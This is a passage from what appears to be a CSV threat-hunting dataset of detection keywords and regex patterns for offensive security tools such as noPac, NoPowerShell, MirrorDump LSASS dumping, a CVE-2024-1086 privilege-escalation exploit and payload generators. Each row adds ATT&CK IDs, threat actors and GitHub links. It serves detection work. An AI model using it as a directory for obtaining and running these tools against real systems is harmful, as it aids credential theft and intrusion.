tools","https://github.com/ricardojba/noPac","1","0","N/A","N/A","1","34","5","2021-12-19T17:42:12Z","2021-12-13T18:51:31Z" "*noPac.csproj.AssemblyReference.cache*",".{0,1000}noPac\.csproj\.AssemblyReference\.cache.{0,1000}","offensive_tool_keyword","POC","POC exploitation for CVE-2021-42278 and 
CVE-2021-42287 to impersonate DA from standard domain user","T1548 - T1134 - T1078 - T1078.002","TA0004 ","N/A","N/A","Exploitation tools","https://github.com/ricardojba/noPac","1","0","N/A","N/A","1","34","5","2021-12-19T17:42:12Z","2021-12-13T18:51:31Z" "*noPac.py*",".{0,1000}noPac\.py.{0,1000}","offensive_tool_keyword","POC","POC exploitation for CVE-2021-42278 and CVE-2021-42287 to impersonate DA from standard domain user","T1548 - T1134 - T1078 - T1078.002","TA0004 ","N/A","N/A","Exploitation tools","https://github.com/Ridter/noPac","1","0","N/A","N/A","8","720","115","2023-01-29T03:31:27Z","2021-12-13T10:28:12Z" "*noPac.sln*",".{0,1000}noPac\.sln.{0,1000}","offensive_tool_keyword","POC","POC exploitation for CVE-2021-42278 and CVE-2021-42287 to impersonate DA from standard domain user","T1548 - T1134 - T1078 - T1078.002","TA0004 ","N/A","N/A","Exploitation tools","https://github.com/ricardojba/noPac","1","0","N/A","N/A","1","34","5","2021-12-19T17:42:12Z","2021-12-13T18:51:31Z" "*nopcorn/DuckDuckC2*",".{0,1000}nopcorn\/DuckDuckC2.{0,1000}","offensive_tool_keyword","DuckDuckC2","A proof-of-concept C2 channel through DuckDuckGo's image proxy service","T1071.001 - T1090.003","TA0011 - TA0042","N/A","N/A","C2","https://github.com/nopcorn/DuckDuckC2","1","1","N/A","10","10","69","7","2023-11-12T10:24:59Z","2023-09-23T20:00:09Z" "*NoPowerShell.cna*",".{0,1000}NoPowerShell\.cna.{0,1000}","offensive_tool_keyword","C2 related tools","PowerShell rebuilt in C# for Red Teaming purposes","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - 
T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","FIN7 - APT19 - menuPass - Threat Group-3390 - FIN6 - APT37 - Wizard Spider - TA505 - Cobalt Group - DarkHydrus - APT41 - Mustang Panda - Earth Lusca - APT29 - LuminousMoth - APT32 - Chimera - Leviathan - CopyKittens - Aquatic Panda - Indrik Spider","C2","https://github.com/bitsadmin/nopowershell","1","1","N/A","10","10","883","130","2023-11-10T09:31:25Z","2018-11-28T21:07:51Z" "*NoPowerShell.cna*",".{0,1000}NoPowerShell\.cna.{0,1000}","offensive_tool_keyword","nopowershell","NoPowerShell is a tool implemented in C# which supports executing PowerShell-like commands while remaining invisible to any PowerShell logging mechanisms. This .NET Framework 2 compatible binary can be loaded in Cobalt Strike to execute commands in-memory. No System.Management.Automation.dll is used. only native .NET libraries. An alternative usecase for NoPowerShell is to launch it as a DLL via rundll32.exe: rundll32 NoPowerShell.dll.main.","T1059 - T1086 - T1500 - T1564 - T1127 - T1027","TA0002 - TA0003 - TA0005","N/A","N/A","Defense Evasion","https://github.com/bitsadmin/nopowershell","1","1","N/A","10","10","883","130","2023-11-10T09:31:25Z","2018-11-28T21:07:51Z" "*NoPowerShell.Commands*",".{0,1000}NoPowerShell\.Commands.{0,1000}","offensive_tool_keyword","nopowershell","NoPowerShell is a tool implemented in C# which supports executing PowerShell-like commands while remaining invisible to any PowerShell logging mechanisms. This .NET Framework 2 compatible binary can be loaded in Cobalt Strike to execute commands in-memory. No System.Management.Automation.dll is used. only native .NET libraries. 
An alternative usecase for NoPowerShell is to launch it as a DLL via rundll32.exe: rundll32 NoPowerShell.dll.main.","T1059 - T1086 - T1500 - T1564 - T1127 - T1027","TA0002 - TA0003 - TA0005","N/A","N/A","Defense Evasion","https://github.com/bitsadmin/nopowershell","1","0","N/A","10","10","883","130","2023-11-10T09:31:25Z","2018-11-28T21:07:51Z" "*NoPowerShell.Commands.Management*",".{0,1000}NoPowerShell\.Commands\.Management.{0,1000}","offensive_tool_keyword","nopowershell","NoPowerShell is a tool implemented in C# which supports executing PowerShell-like commands while remaining invisible to any PowerShell logging mechanisms. This .NET Framework 2 compatible binary can be loaded in Cobalt Strike to execute commands in-memory. No System.Management.Automation.dll is used. only native .NET libraries. An alternative usecase for NoPowerShell is to launch it as a DLL via rundll32.exe: rundll32 NoPowerShell.dll.main.","T1059 - T1086 - T1500 - T1564 - T1127 - T1027","TA0002 - TA0003 - TA0005","N/A","N/A","Defense Evasion","https://github.com/bitsadmin/nopowershell","1","0","N/A","10","10","883","130","2023-11-10T09:31:25Z","2018-11-28T21:07:51Z" "*NoPowerShell.csproj*",".{0,1000}NoPowerShell\.csproj.{0,1000}","offensive_tool_keyword","nopowershell","NoPowerShell is a tool implemented in C# which supports executing PowerShell-like commands while remaining invisible to any PowerShell logging mechanisms. This .NET Framework 2 compatible binary can be loaded in Cobalt Strike to execute commands in-memory. No System.Management.Automation.dll is used. only native .NET libraries. 
An alternative usecase for NoPowerShell is to launch it as a DLL via rundll32.exe: rundll32 NoPowerShell.dll.main.","T1059 - T1086 - T1500 - T1564 - T1127 - T1027","TA0002 - TA0003 - TA0005","N/A","N/A","Defense Evasion","https://github.com/bitsadmin/nopowershell","1","0","N/A","10","10","883","130","2023-11-10T09:31:25Z","2018-11-28T21:07:51Z" "*NoPowerShell.dll*",".{0,1000}NoPowerShell\.dll.{0,1000}","offensive_tool_keyword","C2 related tools","PowerShell rebuilt in C# for Red Teaming purposes","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","FIN7 - APT19 - menuPass - Threat Group-3390 - FIN6 - APT37 - Wizard Spider - TA505 - Cobalt Group - DarkHydrus - APT41 - Mustang Panda - Earth Lusca - APT29 - LuminousMoth - APT32 - Chimera - Leviathan - CopyKittens - Aquatic Panda - Indrik Spider","C2","https://github.com/bitsadmin/nopowershell","1","1","N/A","10","10","883","130","2023-11-10T09:31:25Z","2018-11-28T21:07:51Z" "*NoPowerShell.dll*",".{0,1000}NoPowerShell\.dll.{0,1000}","offensive_tool_keyword","nopowershell","NoPowerShell is a tool implemented in C# which supports executing PowerShell-like commands while remaining invisible to any PowerShell logging mechanisms. This .NET Framework 2 compatible binary can be loaded in Cobalt Strike to execute commands in-memory. 
No System.Management.Automation.dll is used. only native .NET libraries. An alternative usecase for NoPowerShell is to launch it as a DLL via rundll32.exe: rundll32 NoPowerShell.dll.main.","T1059 - T1086 - T1500 - T1564 - T1127 - T1027","TA0002 - TA0003 - TA0005","N/A","N/A","Defense Evasion","https://github.com/bitsadmin/nopowershell","1","1","N/A","10","10","883","130","2023-11-10T09:31:25Z","2018-11-28T21:07:51Z" "*nopowershell.exe*",".{0,1000}nopowershell\.exe.{0,1000}","offensive_tool_keyword","C2 related tools","PowerShell rebuilt in C# for Red Teaming purposes","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","FIN7 - APT19 - menuPass - Threat Group-3390 - FIN6 - APT37 - Wizard Spider - TA505 - Cobalt Group - DarkHydrus - APT41 - Mustang Panda - Earth Lusca - APT29 - LuminousMoth - APT32 - Chimera - Leviathan - CopyKittens - Aquatic Panda - Indrik Spider","C2","https://github.com/bitsadmin/nopowershell","1","1","N/A","10","10","883","130","2023-11-10T09:31:25Z","2018-11-28T21:07:51Z" "*NoPowerShell.exe*",".{0,1000}NoPowerShell\.exe.{0,1000}","offensive_tool_keyword","nopowershell","NoPowerShell is a tool implemented in C# which supports executing PowerShell-like commands while remaining invisible to any PowerShell logging mechanisms. 
This .NET Framework 2 compatible binary can be loaded in Cobalt Strike to execute commands in-memory. No System.Management.Automation.dll is used. only native .NET libraries. An alternative usecase for NoPowerShell is to launch it as a DLL via rundll32.exe: rundll32 NoPowerShell.dll.main.","T1059 - T1086 - T1500 - T1564 - T1127 - T1027","TA0002 - TA0003 - TA0005","N/A","N/A","Defense Evasion","https://github.com/bitsadmin/nopowershell","1","1","N/A","10","10","883","130","2023-11-10T09:31:25Z","2018-11-28T21:07:51Z" "*NoPowerShell.sln*",".{0,1000}NoPowerShell\.sln.{0,1000}","offensive_tool_keyword","nopowershell","NoPowerShell is a tool implemented in C# which supports executing PowerShell-like commands while remaining invisible to any PowerShell logging mechanisms. This .NET Framework 2 compatible binary can be loaded in Cobalt Strike to execute commands in-memory. No System.Management.Automation.dll is used. only native .NET libraries. An alternative usecase for NoPowerShell is to launch it as a DLL via rundll32.exe: rundll32 NoPowerShell.dll.main.","T1059 - T1086 - T1500 - T1564 - T1127 - T1027","TA0002 - TA0003 - TA0005","N/A","N/A","Defense Evasion","https://github.com/bitsadmin/nopowershell","1","1","N/A","10","10","883","130","2023-11-10T09:31:25Z","2018-11-28T21:07:51Z" "*NoPowerShell/*.cs*",".{0,1000}NoPowerShell\/.{0,1000}\.cs.{0,1000}","offensive_tool_keyword","C2 related tools","PowerShell rebuilt in C# for Red Teaming purposes","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - 
T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","FIN7 - APT19 - menuPass - Threat Group-3390 - FIN6 - APT37 - Wizard Spider - TA505 - Cobalt Group - DarkHydrus - APT41 - Mustang Panda - Earth Lusca - APT29 - LuminousMoth - APT32 - Chimera - Leviathan - CopyKittens - Aquatic Panda - Indrik Spider","C2","https://github.com/bitsadmin/nopowershell","1","1","N/A","10","10","883","130","2023-11-10T09:31:25Z","2018-11-28T21:07:51Z" "*NoPowerShell_trunk.zip*",".{0,1000}NoPowerShell_trunk\.zip.{0,1000}","offensive_tool_keyword","nopowershell","NoPowerShell is a tool implemented in C# which supports executing PowerShell-like commands while remaining invisible to any PowerShell logging mechanisms. This .NET Framework 2 compatible binary can be loaded in Cobalt Strike to execute commands in-memory. No System.Management.Automation.dll is used. only native .NET libraries. An alternative usecase for NoPowerShell is to launch it as a DLL via rundll32.exe: rundll32 NoPowerShell.dll.main.","T1059 - T1086 - T1500 - T1564 - T1127 - T1027","TA0002 - TA0003 - TA0005","N/A","N/A","Defense Evasion","https://github.com/bitsadmin/nopowershell","1","1","N/A","10","10","883","130","2023-11-10T09:31:25Z","2018-11-28T21:07:51Z" "*NoPowerShell32.dll*",".{0,1000}NoPowerShell32\.dll.{0,1000}","offensive_tool_keyword","nopowershell","NoPowerShell is a tool implemented in C# which supports executing PowerShell-like commands while remaining invisible to any PowerShell logging mechanisms. This .NET Framework 2 compatible binary can be loaded in Cobalt Strike to execute commands in-memory. No System.Management.Automation.dll is used. only native .NET libraries. 
An alternative usecase for NoPowerShell is to launch it as a DLL via rundll32.exe: rundll32 NoPowerShell.dll.main.","T1059 - T1086 - T1500 - T1564 - T1127 - T1027","TA0002 - TA0003 - TA0005","N/A","N/A","Defense Evasion","https://github.com/bitsadmin/nopowershell","1","1","N/A","10","10","883","130","2023-11-10T09:31:25Z","2018-11-28T21:07:51Z" "*NoPowerShell64.dll*",".{0,1000}NoPowerShell64\.dll.{0,1000}","offensive_tool_keyword","nopowershell","NoPowerShell is a tool implemented in C# which supports executing PowerShell-like commands while remaining invisible to any PowerShell logging mechanisms. This .NET Framework 2 compatible binary can be loaded in Cobalt Strike to execute commands in-memory. No System.Management.Automation.dll is used. only native .NET libraries. An alternative usecase for NoPowerShell is to launch it as a DLL via rundll32.exe: rundll32 NoPowerShell.dll.main.","T1059 - T1086 - T1500 - T1564 - T1127 - T1027","TA0002 - TA0003 - TA0005","N/A","N/A","Defense Evasion","https://github.com/bitsadmin/nopowershell","1","1","N/A","10","10","883","130","2023-11-10T09:31:25Z","2018-11-28T21:07:51Z" "*NoPowerShellDll.*",".{0,1000}NoPowerShellDll\..{0,1000}","offensive_tool_keyword","nopowershell","NoPowerShell is a tool implemented in C# which supports executing PowerShell-like commands while remaining invisible to any PowerShell logging mechanisms. This .NET Framework 2 compatible binary can be loaded in Cobalt Strike to execute commands in-memory. No System.Management.Automation.dll is used. only native .NET libraries. 
An alternative usecase for NoPowerShell is to launch it as a DLL via rundll32.exe: rundll32 NoPowerShell.dll.main.","T1059 - T1086 - T1500 - T1564 - T1127 - T1027","TA0002 - TA0003 - TA0005","N/A","N/A","Defense Evasion","https://github.com/bitsadmin/nopowershell","1","0","N/A","10","10","883","130","2023-11-10T09:31:25Z","2018-11-28T21:07:51Z" "*normal/randomized.profile*",".{0,1000}normal\/randomized\.profile.{0,1000}","offensive_tool_keyword","cobaltstrike","Malleable C2 is a domain specific language to redefine indicators in Beacon's communication. This repository is a collection of Malleable C2 profiles that you may use. These profiles work with Cobalt Strike 3.x","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/rsmudge/Malleable-C2-Profiles","1","1","N/A","10","10","1427","420","2021-05-18T14:45:39Z","2014-07-14T15:02:42Z" "*northdata-get-company-names *",".{0,1000}northdata\-get\-company\-names\s.{0,1000}","offensive_tool_keyword","thoth","Automate recon for red team assessments.","T1190 - T1083 - T1018","TA0007 - TA0043 
- TA0001","N/A","N/A","Reconnaissance","https://github.com/r1cksec/thoth","1","0","N/A","7","1","84","11","2024-03-01T11:51:24Z","2021-11-15T13:40:56Z" "*noseyparker report --datastore *",".{0,1000}noseyparker\sreport\s\-\-datastore\s.{0,1000}","offensive_tool_keyword","noseyparker","Nosey Parker is a command-line program that finds secrets and sensitive information in textual data and Git history.","T1583 - T1059.001 - T1059.003","TA0002 - TA0003 - TA0040","N/A","N/A","Credential Access","https://github.com/praetorian-inc/noseyparker","1","1","N/A","8","10","1514","72","2024-04-29T15:26:13Z","2022-11-08T23:09:17Z" "*noseyparker scan --datastore *",".{0,1000}noseyparker\sscan\s\-\-datastore\s.{0,1000}","offensive_tool_keyword","noseyparker","Nosey Parker is a command-line program that finds secrets and sensitive information in textual data and Git history.","T1583 - T1059.001 - T1059.003","TA0002 - TA0003 - TA0040","N/A","N/A","Credential Access","https://github.com/praetorian-inc/noseyparker","1","1","N/A","8","10","1514","72","2024-04-29T15:26:13Z","2022-11-08T23:09:17Z" "*noseyparker summarize --datastore *",".{0,1000}noseyparker\ssummarize\s\-\-datastore\s.{0,1000}","offensive_tool_keyword","noseyparker","Nosey Parker is a command-line program that finds secrets and sensitive information in textual data and Git history.","T1583 - T1059.001 - T1059.003","TA0002 - TA0003 - TA0040","N/A","N/A","Credential Access","https://github.com/praetorian-inc/noseyparker","1","1","N/A","8","10","1514","72","2024-04-29T15:26:13Z","2022-11-08T23:09:17Z" "*noseyparker-cli*",".{0,1000}noseyparker\-cli.{0,1000}","offensive_tool_keyword","noseyparker","Nosey Parker is a command-line program that finds secrets and sensitive information in textual data and Git history.","T1583 - T1059.001 - T1059.003","TA0002 - TA0003 - TA0040","N/A","N/A","Credential 
Access","https://github.com/praetorian-inc/noseyparker","1","1","N/A","8","10","1514","72","2024-04-29T15:26:13Z","2022-11-08T23:09:17Z" "*noseyparker-main*",".{0,1000}noseyparker\-main.{0,1000}","offensive_tool_keyword","noseyparker","Nosey Parker is a command-line program that finds secrets and sensitive information in textual data and Git history.","T1583 - T1059.001 - T1059.003","TA0002 - TA0003 - TA0040","N/A","N/A","Credential Access","https://github.com/praetorian-inc/noseyparker","1","1","N/A","8","10","1514","72","2024-04-29T15:26:13Z","2022-11-08T23:09:17Z" "*noseyparker-v*-universal-macos*",".{0,1000}noseyparker\-v.{0,1000}\-universal\-macos.{0,1000}","offensive_tool_keyword","noseyparker","Nosey Parker is a command-line program that finds secrets and sensitive information in textual data and Git history.","T1583 - T1059.001 - T1059.003","TA0002 - TA0003 - TA0040","N/A","N/A","Credential Access","https://github.com/praetorian-inc/noseyparker","1","1","N/A","8","10","1514","72","2024-04-29T15:26:13Z","2022-11-08T23:09:17Z" "*noseyparker-v*-x86_64-unknown-linux-gnu*",".{0,1000}noseyparker\-v.{0,1000}\-x86_64\-unknown\-linux\-gnu.{0,1000}","offensive_tool_keyword","noseyparker","Nosey Parker is a command-line program that finds secrets and sensitive information in textual data and Git history.","T1583 - T1059.001 - T1059.003","TA0002 - TA0003 - TA0040","N/A","N/A","Credential Access","https://github.com/praetorian-inc/noseyparker","1","1","N/A","8","10","1514","72","2024-04-29T15:26:13Z","2022-11-08T23:09:17Z" "*Nosql-Exploitation-Framework*",".{0,1000}Nosql\-Exploitation\-Framework.{0,1000}","offensive_tool_keyword","Nosql-Exploitation-Framework","A FrameWork For NoSQL Scanning and Exploitation Framework","T1210 - T1211 - T1021 - T1059","TA0002 - TA0011 - TA0003","N/A","N/A","Frameworks","https://github.com/torque59/Nosql-Exploitation-Framework","1","1","N/A","N/A","6","593","157","2024-04-30T18:18:31Z","2013-12-26T17:46:11Z" 
"*NoSQLMap*",".{0,1000}NoSQLMap.{0,1000}","offensive_tool_keyword","NoSQLMap","Automated NoSQL database enumeration and web application exploitation tool.","T1190 - T1210 - T1506","TA0002 - TA0007 - TA0040","N/A","N/A","Frameworks","https://github.com/codingo/NoSQLMap","1","0","N/A","N/A","10","2759","570","2024-04-08T15:41:52Z","2013-09-24T15:01:30Z" "*notdodo/LocalAdminSharp*",".{0,1000}notdodo\/LocalAdminSharp.{0,1000}","offensive_tool_keyword","LocalAdminSharp",".NET executable to use when dealing with privilege escalation on Windows to gain local administrator access","T1055.011 - T1068 - T1548.002 - T1548.003 - T1548.004","TA0004","N/A","N/A","Privilege Escalation","https://github.com/notdodo/LocalAdminSharp","1","1","N/A","10","2","150","17","2022-11-01T17:45:43Z","2022-01-01T10:35:09Z" "*notepad FUZZ*",".{0,1000}notepad\sFUZZ.{0,1000}","offensive_tool_keyword","litefuzz","A multi-platform fuzzer for poking at userland binaries and servers","T1587.004","TA0009","N/A","N/A","Exploitation tools","https://github.com/sec-tools/litefuzz","1","0","N/A","7","1","63","11","2023-07-16T00:15:41Z","2021-09-17T14:40:07Z" "*NotLSASS.zip*",".{0,1000}NotLSASS\.zip.{0,1000}","offensive_tool_keyword","MirrorDump","LSASS dumping tool that uses a dynamically compiled LSA plugin to grab an lsass handle and API hooking for capturing the dump in memory","T1003 - T1055 - T1574","TA0006 - TA0005 - TA0003","N/A","N/A","Credential Access","https://github.com/CCob/MirrorDump","1","0","N/A","10","3","258","59","2021-03-18T18:19:00Z","2021-03-18T18:18:56Z" "*NotLSASS1.zip*",".{0,1000}NotLSASS1\.zip.{0,1000}","offensive_tool_keyword","MirrorDump","LSASS dumping tool that uses a dynamically compiled LSA plugin to grab an lsass handle and API hooking for capturing the dump in memory","T1003 - T1055 - T1574","TA0006 - TA0005 - TA0003","N/A","N/A","Credential Access","https://github.com/CCob/MirrorDump","1","0","N/A","10","3","258","59","2021-03-18T18:19:00Z","2021-03-18T18:18:56Z" 
"*notredamecheatstowin>*",".{0,1000}notredamecheatstowin\>.{0,1000}","offensive_tool_keyword","Egress-Assess","Egress-Assess is a tool used to test egress data detection capabilities","T1561 - T1041 - T1558 - T1071 - T1074","TA0010 - TA0011 - TA0008","N/A","Darkhotel - DUBNIUM - Putter Panda","Exploitation tools","https://github.com/FortyNorthSecurity/Egress-Assess","1","0","can be used for data exfiltration simulation","8","6","587","136","2023-08-09T18:40:57Z","2014-12-10T13:39:11Z" "*Notselwyn/CVE-2024-1086*",".{0,1000}Notselwyn\/CVE\-2024\-1086.{0,1000}","offensive_tool_keyword","POC","local privilege escalation Proof-of-Concept exploit for CVE-2024-1086 working on most Linux kernels between v5.14 and v6.6","T1068 - T1548.002","TA0004","N/A","N/A","Privilege Escalation","https://github.com/Notselwyn/CVE-2024-1086","1","1","CVE-2024-1086 POC","10","10","1898","237","2024-04-17T16:09:54Z","2024-03-20T21:16:41Z" "*Notselwyn/netkit*",".{0,1000}Notselwyn\/netkit.{0,1000}","offensive_tool_keyword","netkit","Netkit is a purposefully small rootkit which can be used by clients over network to maintain a sneaky foothold into a device.","T1547 - T1021 - T1071 - T1562.001 - T1055 - T1041 - T1105","TA0003 - TA0005 - TA0002 - TA0007 - TA0009 - TA0040","N/A","N/A","Defense Evasion","https://github.com/Notselwyn/netkit","1","1","N/A","10","1","17","3","2024-03-27T19:07:03Z","2023-07-19T00:00:45Z" "*NovaLdr-main*",".{0,1000}NovaLdr\-main.{0,1000}","offensive_tool_keyword","NovaLdr","NovaLdr is a Threadless Module Stomping written in Rust designed as a learning project while exploring the world of malware development. 
It uses advanced techniques like indirect syscalls and string encryption to achieve its functionalities","T1027.001 - T1055.012 - T1112 - T1574.002 - T1055 - T1056.002 - T1027.002 - T1070.004 - T1129","TA0004 - TA0005 - TA0040 - TA0011","N/A","N/A","Defense Evasion","https://github.com/BlackSnufkin/NovaLdr","1","1","N/A","10","3","205","31","2023-11-16T13:42:41Z","2023-10-19T07:54:39Z" "*novelbfh.zip*",".{0,1000}novelbfh\.zip.{0,1000}","offensive_tool_keyword","novelbfh","Brute force Novell hacking tool -- Circa 1993","T1110","TA0006 - TA0007","N/A","N/A","Credential Access","https://github.com/nyxgeek/classic_hacking_tools","1","1","N/A","N/A","1","2","0","2023-04-16T02:15:42Z","2023-04-16T01:49:12Z" "*--noWAIT --noFUNC --donut --rehash n --silent -o /tmp/*",".{0,1000}\-\-noWAIT\s\-\-noFUNC\s\-\-donut\s\-\-rehash\sn\s\-\-silent\s\-o\s\/tmp\/.{0,1000}","offensive_tool_keyword","CSExec","An alternative to *exec.py from impacket with some builtin tricks","T1059.001 - T1059.005 - T1071.001","TA0002","N/A","N/A","Lateral Movement","https://github.com/Metro-Holografix/CSExec.py","1","0","private github repo","10","N/A","N/A","N/A","N/A","N/A" "*nping *",".{0,1000}nping\s.{0,1000}","offensive_tool_keyword","nping","Nping is an open source tool for network packet generation. response analysis and response time measurement. Nping can generate network packets for a wide range of protocols. allowing users full control over protocol headers. While Nping can be used as a simple ping utility to detect active hosts. it can also be used as a raw packet generator for network stack stress testing. ARP poisoning. Denial of Service attacks. route tracing. etc. Npings novel echo mode lets users see how packets change in transit between the source and destination hosts. Thats a great way to understand firewall rules. detect packet corruption. 
and more","T1040 - T1052 - T1065 - T1096 - T1102 - T1113 - T1114 - T1123 - T1127 - T1136 - T1143 - T1190 - T1200 - T1201 - T1219 - T1222 - T1496 - T1497 - T1557 - T1560 - T1573 - T1574 - T1608","TA0001 - TA0002 - TA0003 - TA0007 - TA0011","N/A","N/A","Sniffing & Spoofing","https://nmap.org/nping/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*nps whoami*",".{0,1000}nps\swhoami.{0,1000}","offensive_tool_keyword","C2 related tools","PowerShell rebuilt in C# for Red Teaming purposes","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","FIN7 - APT19 - menuPass - Threat Group-3390 - FIN6 - APT37 - Wizard Spider - TA505 - Cobalt Group - DarkHydrus - APT41 - Mustang Panda - Earth Lusca - APT29 - LuminousMoth - APT32 - Chimera - Leviathan - CopyKittens - Aquatic Panda - Indrik Spider","C2","https://github.com/bitsadmin/nopowershell","1","0","N/A","10","10","883","130","2023-11-10T09:31:25Z","2018-11-28T21:07:51Z" "*nps whoami*",".{0,1000}nps\swhoami.{0,1000}","offensive_tool_keyword","nopowershell","NoPowerShell is a tool implemented in C# which supports executing PowerShell-like commands while remaining invisible to any PowerShell logging mechanisms. This .NET Framework 2 compatible binary can be loaded in Cobalt Strike to execute commands in-memory. No System.Management.Automation.dll is used. 
only native .NET libraries. An alternative usecase for NoPowerShell is to launch it as a DLL via rundll32.exe: rundll32 NoPowerShell.dll.main.","T1059 - T1086 - T1500 - T1564 - T1127 - T1027","TA0002 - TA0003 - TA0005","N/A","N/A","Defense Evasion","https://github.com/bitsadmin/nopowershell","1","0","N/A","10","10","883","130","2023-11-10T09:31:25Z","2018-11-28T21:07:51Z" "*nps_payload*",".{0,1000}nps_payload.{0,1000}","offensive_tool_keyword","nps_payload","This script will generate payloads for basic intrusion detection avoidance. It utilizes publicly demonstrated techniques from several different sources.","T1059.007 - T1218.001 - T1027.002","TA0002 - TA0003 - TA0007","N/A","N/A","Defense Evasion","https://github.com/trustedsec/nps_payload","1","1","N/A","N/A","5","431","130","2023-11-30T09:24:13Z","2017-07-23T17:01:19Z" "*nps_payload.py*",".{0,1000}nps_payload\.py.{0,1000}","offensive_tool_keyword","nps_payload","This script will generate payloads for basic intrusion detection avoidance","T1027 - T1027.005 - T1055 - T1211","TA0005 - TA0004","N/A","N/A","Exploitation tools","https://github.com/trustedsec/nps_payload","1","1","N/A","9","5","431","130","2023-11-30T09:24:13Z","2017-07-23T17:01:19Z" "*nps_payload-master*",".{0,1000}nps_payload\-master.{0,1000}","offensive_tool_keyword","nps_payload","This script will generate payloads for basic intrusion detection avoidance","T1027 - T1027.005 - T1055 - T1211","TA0005 - TA0004","N/A","N/A","Exploitation tools","https://github.com/trustedsec/nps_payload","1","1","N/A","9","5","431","130","2023-11-30T09:24:13Z","2017-07-23T17:01:19Z" "*nrf24-scanner.py -l 